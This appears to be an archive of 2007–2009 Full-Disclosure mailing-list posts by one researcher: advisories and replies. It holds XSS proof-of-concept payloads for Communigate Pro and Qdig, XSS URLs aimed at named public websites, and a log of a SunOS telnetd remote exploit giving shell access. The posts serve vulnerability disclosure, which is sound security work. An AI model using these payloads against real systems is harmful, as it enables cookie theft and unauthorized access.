[Full-disclosure] Stored XSS on Communigate Pro 5.2.14 and prior versions

2009-07-24 Thread Andrea Purificato - bunker 
- Description
The Communigate Pro webmail framework is prone to a stored Cross Site
Scripting vulnerability through crafted plain text email messages.

- Affected version:
5.2.14 and prior as reported from Communigate:
http://www.communigate.com/cgatepro/History52.html

- Details
This vulnerability can be exploited if an attacker sends a plain text
message to the victim address containing a malicious crafted URL;
the internal parser fails to parse the malicious URL and executes
Javascript code every time user reads the message.
An attacker may be able to use this vulnerability to steal sensitive
information from a user's computer (e.g. current SessionID) or force
the user's computer to execute stealed operations.

- Example of crafted URL
http://www.example.com/&z=";>alert(document.cookie)&f=

- Patch
Install Communigate Pro 5.2.13
5.2.15 15-Jul-2009: * Bug Fix: WebUser: 5.1.2: links in plain text
messages could be processed incorrectly.

- Communigate
http://www.communigate.com/cgatepro/

-- 
Andrea Purificato
http://rawlab.mindcreations.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] informative...

2007-08-29 Thread Andrea Purificato - bunker 
On Wednesday 29 August 2007, Fabio Pietrosanti (naif) wrote:

> http://seclists.org/fulldisclosure/2007/Jul/0504.html
> comments?

Hi Fabio,

I fully agree with you, but i have less trouble than you speaking about this 
type of vulnerability after reporting the XSS to the owner.
If nobody replies to me after reasonable time, I consider my work finished and 
I feel free to talking about anything, in the spirit of full-disclosure.

If someone wants to public "0day" XSS without report it to the owner, it's not 
my problem!

Regards,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] informative...

2007-08-29 Thread Andrea Purificato - bunker 
Il giorno mer, 29/08/2007 alle 09.31 -0400, Fabrizio ha scritto:
> And even more informative
> 
> http://www.belkin.com/search/?q=%3cscript%3ealert('XSS')%3c%2fscript%
> 3e&sid=1
> 

[Informative 2]

It seems a common practice, otherwise they were warned months ago, but
no answer...

http://sitesearch.corriere.it/searchresults.jsp?adsEnvironment=corriere&channel_par=corriere&ricerca_par=%22%3Cscript%3Ealert('XSS');%3C/script%3E


Bye,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day Oracle 10g exploit - dbms_aq.enqueue - become DBA

2007-04-02 Thread Andrea Purificato - bunker 
On Monday 02 April 2007 20:12, Gadi Evron wrote:

> Not a 0day. Just publicly released exploit code.

You're right, sorry for mistakes. I meant "first public exploit".

> This is:
> 1. Patched.

Yes: CPUJan2007

> 2. Not publicly exploitable.

Permission grant to public between 9.0.1.x and 10.1.0.x (without CPUJan2007).


Thanks for clarification,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] "0day was the case that they gave me"

2007-02-11 Thread Andrea Purificato - bunker 
Alle 07:00, domenica 11 febbraio 2007, Tyop? ha scritto:

> Ok. Someone have a Sol10?

(11:10) [EMAIL PROTECTED]:~$ sh test.sh

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED]
 ./sunos  
 ./sunos localhost bin

(11:11) [EMAIL PROTECTED]:~$ sh test.sh sparclab bunker

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED]

 ALEX ALEX

 Trying 23.255.212.138...
 Connected to sparclab.
 Escape character is '^]'.
 Last login: Sun Feb 11 11:08:21 from syn
 Sun Microsystems Inc.   SunOS 5.11  snv_49  October 2007

(11:09) [EMAIL PROTECTED]:~$ uname -a; id;
 SunOS sparclab 5.11 snv_49 sun4u sparc SUNW,Ultra-5_10
 uid=100(bunker) gid=1(other)

(11:09) [EMAIL PROTECTED]:~$ exit
 logout
 Connection closed by foreign host.




Absolutely disarming!
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [XSS] Qdig - Quick Digital Image Gallery Version 1.2.9.3 and -devel

2007-02-11 Thread Andrea Purificato - bunker 
Alle 21:54, sabato 10 febbraio 2007, Andrea Purificato - bunker ha scritto:

> Version affected: qdig-1.2.9.3, qdig-devel-20060624

Bug fixed by 1.2.9.4 and devel-20070210


Thanks to haganafox for his work,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [XSS] Qdig - Quick Digital Image Gallery Version 1.2.9.3 and -devel

2007-02-10 Thread Andrea Purificato - bunker 
Qdig - Quick Digital Image Gallery - http://qdig.sourceforge.net/)

Version affected: qdig-1.2.9.3, qdig-devel-20060624 

Risk: XSS

Description:
Qdig is an easy-to-use PHP script that dynamically presents your digital image 
files as an online gallery or set of galleries.

Vulnerability:
It's vulnerable to XSS (Cross Site Scripting) attack,
examples:
 - /?Qwd=\0%22%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E 
 - /?Qwd=\0%22%3Cbody%20onload=document.write(navigator.userAgent);%3E  

Solution:
No solution until author answer.

Credits: 
Andrea "bunker" Purificato - http://rawlab.mindcreations.com


Mail copied to the author: haganafox AT sf (no other email found)
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PS Information Leak on HP True64 Alpha OSF1 v5.1 1885

2007-02-07 Thread Andrea Purificato - bunker 
Alle 21:05, martedì 6 febbraio 2007, hai scritto:

> I would guess the behavior you just discovered has been
> known for a long time.

It doesn't mean that things will always be that way :-)
See here: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102215-1

> PS: Why should ps to work correctly without the setuid bit?

because all recent "ps" works without it, and remove bit from executable is 
not a workaround in this case.
Maybe it's time to abandon the stone age :-)


Bye,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/